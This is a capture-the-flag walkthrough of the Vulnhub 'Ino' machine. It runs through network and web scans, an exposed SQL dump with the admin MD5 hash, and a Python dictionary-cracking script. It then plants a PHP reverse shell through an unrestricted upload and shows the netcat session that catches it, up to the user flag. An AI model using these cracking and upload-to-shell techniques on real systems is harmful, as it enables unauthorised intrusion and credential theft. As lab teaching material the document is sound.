Vulnhub: Ino machine, detailed walkthrough

Ino

Author: jason_huawen

Basic information about the target

Name: INO: 1.0.1

Address:

https://www.vulnhub.com/entry/ino-101,601/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.77.0/16   |   Screen View: Unique Hosts                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:12:e3:78      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.219  08:00:27:a7:0f:c9      1      60  PCS Systemtechnik GmbH   

netdiscover, which ships with Kali Linux, shows three hosts on the host-only network. 192.168.56.1 is the host's adapter and 192.168.56.100 is VirtualBox's DHCP server, so the target is 192.168.56.219. (The Nmap report line below says 192.168.56.218, but the scan was run against .219 and the MAC address 08:00:27:a7:0f:c9 matches the netdiscover entry; every command in this post uses .219.)

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 09:55 EST
Nmap scan report for localhost (192.168.56.218)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A7:0F:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

The Nmap scan shows two open ports on the target: 22 (SSH, OpenSSH 7.9p1 on Debian 10) and 80 (HTTP, Apache httpd 2.4.38). With nothing else exposed, the web application is the only realistic way in.

Get Access

The site root redirects to /lot/ (index.php answers 302 --> /lot/ in the scans below), so Nikto is pointed at that path. Note that the Nikto run ends in a stream of connection timeouts, and the first gobuster extension scan is refused outright: the target's web server stopped accepting connections for a while during the scans, and they had to be re-run.

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.219/lot/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.219
+ Target Hostname:    192.168.56.219
+ Target Port:        80
+ Start Time:         2022-11-25 02:11:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  19 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-25 02:12:10 (GMT-5) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/25 02:12:31 Starting gobuster in directory enumeration mode
===============================================================
/lot                  (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status        (Status: 403) [Size: 279]
Progress: 217184 / 220561 (98.47%)===============================================================
2022/11/25 02:12:59 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2022/11/25 02:13:13 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.219/: Get "http://192.168.56.219/": dial tcp 192.168.56.219:80: connect: connection refused
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/25 02:13:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 302) [Size: 1] [--> /lot/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/lot                  (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status        (Status: 403) [Size: 279]
Progress: 1100246 / 1102805 (99.77%)===============================================================
2022/11/25 02:15:56 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/lot -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/lot
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/25 02:16:19 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 17722]
/about.php            (Status: 200) [Size: 679]
/home.php             (Status: 200) [Size: 5188]
/header.php           (Status: 200) [Size: 1894]
/admin                (Status: 301) [Size: 320] [--> http://192.168.56.219/lot/admin/]
/assets               (Status: 301) [Size: 321] [--> http://192.168.56.219/lot/assets/]
/footer.php           (Status: 200) [Size: 4393]
/css                  (Status: 301) [Size: 318] [--> http://192.168.56.219/lot/css/]
/database             (Status: 301) [Size: 323] [--> http://192.168.56.219/lot/database/]
/js                   (Status: 301) [Size: 317] [--> http://192.168.56.219/lot/js/]
/head.php             (Status: 200) [Size: 0]
/reserve.php          (Status: 200) [Size: 2518]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 1101943 / 1102805 (99.92%)===============================================================
2022/11/25 02:18:57 Finished
===============================================================

After the directory and file scans, a /database directory turned up under /lot/ with Apache directory listing enabled, exposing a single file:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ curl http://192.168.56.219/lot/database/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /lot/database</title>
 </head>
 <body>
<h1>Index of /lot/database</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/lot/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="lot_db.sql">lot_db.sql</a></td><td align="right">2020-10-20 09:59  </td><td align="right"> 12K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.219 Port 80</address>
</body></html>

Download lot_db.sql to Kali. It is a phpMyAdmin dump of the application's database, and the users table near the end contains a username and a password hash:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ mv ~/Downloads/lot_db.sql .
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat lot_db.sql 
-- phpMyAdmin SQL Dump
-- version 5.0.2
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Oct 20, 2020 at 03:59 AM
-- Server version: 10.4.14-MariaDB
-- PHP Version: 7.2.33

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `lot_db`
--

-- --------------------------------------------------------

--
-- Table structure for table `division`
--

CREATE TABLE `division` (
  `id` int(30) NOT NULL,
  `name` varchar(100) NOT NULL,
  `description` text NOT NULL,
  `map_img` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `division`
--

INSERT INTO `division` (`id`, `name`, `description`, `map_img`) VALUES
(3, 'Phase 1', 'Sample', '1603089660_devSitePlansTileMobile02.jpg'),
(4, 'Phase 2 ', 'Sample only', '1603089960_devSitePlansTileMobile01.jpg');

-- --------------------------------------------------------

--
-- Table structure for table `lots`
--

CREATE TABLE `lots` (
  `id` int(30) NOT NULL,
  `division_id` int(30) NOT NULL,
  `marker_position` text NOT NULL,
  `model_id` int(30) NOT NULL,
  `lot` text NOT NULL,
  `type` tinyint(1) NOT NULL DEFAULT 1 COMMENT '1=lot ,2= house and lot',
  `details` text NOT NULL,
  `price` float NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=unavailable,1=available,2 = reserve'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `lots`
--

INSERT INTO `lots` (`id`, `division_id`, `marker_position`, `model_id`, `lot`, `type`, `details`, `price`, `status`) VALUES
(2, 3, '{\"top\":\"200px\",\"left\":\"233px\"}', 1, 'Lot 1 Block 1', 2, '&lt;b&gt;Area: 6400 sq. ft.&lt;/b&gt;&lt;p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;&quot;&gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis.&lt;/span&gt;&lt;b&gt;&lt;/p&gt;&lt;/p&gt;', 15000, 0),
(3, 4, '{\"top\":\"148px\",\"left\":\"248px\"}', 0, 'Lot 2 Block 1', 1, 'Sample only', 500000, 1),
(4, 4, '{\"top\":\"85px\",\"left\":\"363px\"}', 1, 'Lot 23 Block 6', 2, '&lt;ul&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;li&gt;sample&lt;/li&gt;&lt;li&gt;Test&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;b style=&quot;margin: 0px; padding: 0px; color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;Lorem Ipsum&lt;/b&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;&amp;nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&amp;#x2019;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;', 2300000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `model_houses`
--

CREATE TABLE `model_houses` (
  `id` int(30) NOT NULL,
  `title` varchar(250) NOT NULL,
  `description` text NOT NULL,
  `cover` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `model_houses`
--

INSERT INTO `model_houses` (`id`, `title`, `description`, `cover`) VALUES
(1, 'Two-Story House', '&lt;b&gt;Area:150 sq. m.&lt;/b&gt;&lt;p&gt;&lt;ul&gt;&lt;li&gt;3 Bed Rooms&lt;/li&gt;&lt;li&gt;1 Comfort Room each Floor&lt;/li&gt;&lt;li&gt;Kitchen Area&lt;/li&gt;&lt;li&gt;Dining Area&lt;/li&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;', '1603095120_images.jpg'),
(2, 'Sample Model House', '&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis. Nam nibh leo, sollicitudin eget massa ut, consectetur pellentesque nulla. Curabitur quis mi faucibus, interdum elit sed, auctor ex. Aenean elementum ac lorem ut feugiat. Praesent varius, tortor consectetur varius iaculis, erat sem malesuada velit, in lobortis dolor nibh mollis lectus. Etiam elementum sodales ultricies. Donec non odio non urna laoreet malesuada. Donec tincidunt, purus id condimentum dapibus, tortor risus venenatis leo, in molestie lorem ante ut dui. Mauris pulvinar augue nisl, ut commodo leo blandit tristique. In hac habitasse platea dictumst. 
Nunc semper, nisi ac aliquet lacinia, eros massa dapibus lacus, eu interdum turpis mi vitae nisi.&lt;/span&gt;&lt;p&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;', '1603095180_images.jpg');

-- --------------------------------------------------------

--
-- Table structure for table `reserved`
--

CREATE TABLE `reserved` (
  `id` int(30) NOT NULL,
  `lot_id` int(30) NOT NULL,
  `firstname` varchar(100) NOT NULL,
  `middlename` varchar(100) NOT NULL,
  `lastname` varchar(100) NOT NULL,
  `email` varchar(100) NOT NULL,
  `contact` varchar(100) NOT NULL,
  `address` text NOT NULL,
  `message` text NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=declined/backed out,1= reserved,2=confimed',
  `date_created` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `reserved`
--

INSERT INTO `reserved` (`id`, `lot_id`, `firstname`, `middlename`, `lastname`, `email`, `contact`, `address`, `message`, `status`, `date_created`) VALUES
(2, 2, 'Jsmith', 'C', 'Smith', 'jsmith@sample.com', '0123456548', 'Sample', 'Sample only', 2, '2020-10-20 09:12:10');

-- --------------------------------------------------------

--
-- Table structure for table `system_settings`
--

CREATE TABLE `system_settings` (
  `id` int(30) NOT NULL,
  `name` text NOT NULL,
  `email` varchar(200) NOT NULL,
  `contact` varchar(20) NOT NULL,
  `cover_img` text NOT NULL,
  `about_content` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `system_settings`
--

INSERT INTO `system_settings` (`id`, `name`, `email`, `contact`, `cover_img`, `about_content`) VALUES
(1, 'Lot Reservation Management System', 'info@sample.comm', '+6948 8542 623', '1603096200_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg', '&lt;p style=&quot;text-align: center; background: transparent; position: relative;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-weight: 400; text-align: justify;&quot;&gt;&amp;nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center; background: transparent; position: relative;&quot;&gt;&lt;br&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center; background: transparent; position: relative;&quot;&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;');

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

CREATE TABLE `users` (
  `id` int(30) NOT NULL,
  `name` text NOT NULL,
  `username` varchar(200) NOT NULL,
  `password` text NOT NULL,
  `type` tinyint(1) NOT NULL DEFAULT 3 COMMENT '1=Admin,2=Staff, 3= subscriber'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`id`, `name`, `username`, `password`, `type`) VALUES
(1, 'Administrator', 'admin', '0192023a7bbd73250516f069df18b500', 1);

--
-- Indexes for dumped tables
--

--
-- Indexes for table `division`
--
ALTER TABLE `division`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `lots`
--
ALTER TABLE `lots`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `model_houses`
--
ALTER TABLE `model_houses`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `reserved`
--
ALTER TABLE `reserved`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `system_settings`
--
ALTER TABLE `system_settings`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `division`
--
ALTER TABLE `division`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `lots`
--
ALTER TABLE `lots`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `model_houses`
--
ALTER TABLE `model_houses`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `reserved`
--
ALTER TABLE `reserved`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `system_settings`
--
ALTER TABLE `system_settings`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ 
 

The file contains the username admin and the password hash 0192023a7bbd73250516f069df18b500 for it. The hash is stored as-is in the users table, with no salt column, which is what makes the next step possible.

Run hash-identifier on it to see which algorithm it is likely to be:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 0192023a7bbd73250516f069df18b500

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: ^C

        Bye!
                                        

hash-identifier ranks MD5 first: a 32-hex-character digest is 128 bits, and unsalted MD5 is by far the most common source of such a value in PHP applications of this kind. Looking the digest up on an online MD5 reverse-lookup site:

https://www.cmd5.com/

gives the password admin123. Strictly speaking this is a precomputed-table lookup, not decryption: MD5 is a one-way hash, and the lookup succeeds only because the password is common and unsalted. The same result is reached offline, without sending a target's hash to a third party, with hashcat -m 0 or john --format=raw-md5 against rockyou.txt, which contains admin123.
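The lookup above in code, as an added example that is not part of the original post: the same length-only guess hash-identifier makes, followed by an offline dictionary attack that tries only algorithms whose digest length matches. The wordlist is a constructed stand-in for rockyou.txt; in practice you would stream the real file through the same loop.

```python
import hashlib
import re
from typing import Iterable, List, Optional, Tuple

# The admin hash recovered from lot_db.sql.
TARGET_HASH = "0192023a7bbd73250516f069df18b500"

# Constructed stand-in for a real wordlist such as rockyou.txt (assumption:
# in practice you would read the file line by line, rstrip("\n") each line,
# and pass the iterator to crack_unsalted).
WORDLIST = ["password", "123456", "admin", "letmein", "admin123", "qwerty"]

# Unsalted hex digests hashlib can produce, keyed by digest size in bits.
# MD4/NTLM is left out: the md4 provider is disabled by default in OpenSSL 3
# builds of Python, so hashlib.new("md4") is not portable.
CANDIDATES_BY_BITS = {
    128: ["md5"],
    160: ["sha1"],
    256: ["sha256"],
    512: ["sha512"],
}


def classify_hex_digest(digest: str) -> List[str]:
    """Name the algorithms a bare hex digest could come from, by length only.

    This mirrors what hash-identifier does: 32 hex characters is 128 bits, so
    MD5 is the obvious guess, but nothing in the string itself proves it is
    plain MD5 rather than md5($salt.$pass) or NTLM. Only a successful crack
    settles that.
    """
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return []
    return CANDIDATES_BY_BITS.get(len(digest) * 4, [])


def crack_unsalted(target: str, words: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Offline dictionary attack against an unsalted digest.

    Returns (algorithm, password) on a hit, None otherwise. Each candidate
    word costs one hash per plausible algorithm; a salted scheme would need
    the salt as well and would never match here.
    """
    target = target.lower()
    algorithms = classify_hex_digest(target)
    if not algorithms:
        return None
    for word in words:
        data = word.encode("utf-8")
        for alg in algorithms:
            if hashlib.new(alg, data).hexdigest() == target:
                return alg, word
    return None


if __name__ == "__main__":
    print(classify_hex_digest(TARGET_HASH))
    print(crack_unsalted(TARGET_HASH, WORDLIST))
```

A miss (None) with a large wordlist is itself information: it suggests a salt or a different construction, at which point the application's login code (here, the PHP under /lot/admin) tells you how the hash is really built.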

The directory scan had already found the /admin entry point; log in there with admin / admin123.

Next, find a place to upload a PHP shell.

The Division List page in the admin panel has a file upload (the map_img field seen in the division table of the dump). Uploading shell.php, a PHP reverse shell pointing at the Kali listener below, produces no error, so the upload does not restrict file types. What remains is to find a way to make the server execute shell.php.

Clicking View on the uploaded entry does exactly that, and the reverse shell arrives at the listener:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 37322
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
 07:29:55 up  3:08,  0 users,  load average: 0.00, 0.74, 1.50
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$ 

www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 10  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
drwxr-xr-x  2 ppp  ppp  4.0K Dec  5  2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp  ppp  4.0K Dec  5  2020 .
drwxr-xr-x 3 root root 4.0K Oct 10  2020 ..
lrwxrwxrwx 1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp  ppp   220 Oct 10  2020 .bash_logout
-rw-r--r-- 1 ppp  ppp  3.5K Oct 10  2020 .bashrc
-rw-r--r-- 1 ppp  ppp   807 Oct 10  2020 .profile
-rw-r--r-- 1 ppp  ppp    33 Dec  5  2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a
